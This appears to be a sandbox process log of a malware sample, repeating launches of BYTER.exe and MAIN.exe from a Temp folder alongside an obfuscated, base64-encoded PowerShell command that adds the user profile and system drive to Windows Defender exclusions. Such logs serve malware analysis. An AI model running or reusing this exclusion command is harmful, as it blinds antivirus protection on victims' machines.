"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-358902365948312753863198500276121551-160505813818928297931922359574-1072181426"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-6688185441245147572-776670553-20337787802058778457-2047499821-1255277638-1129605797"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

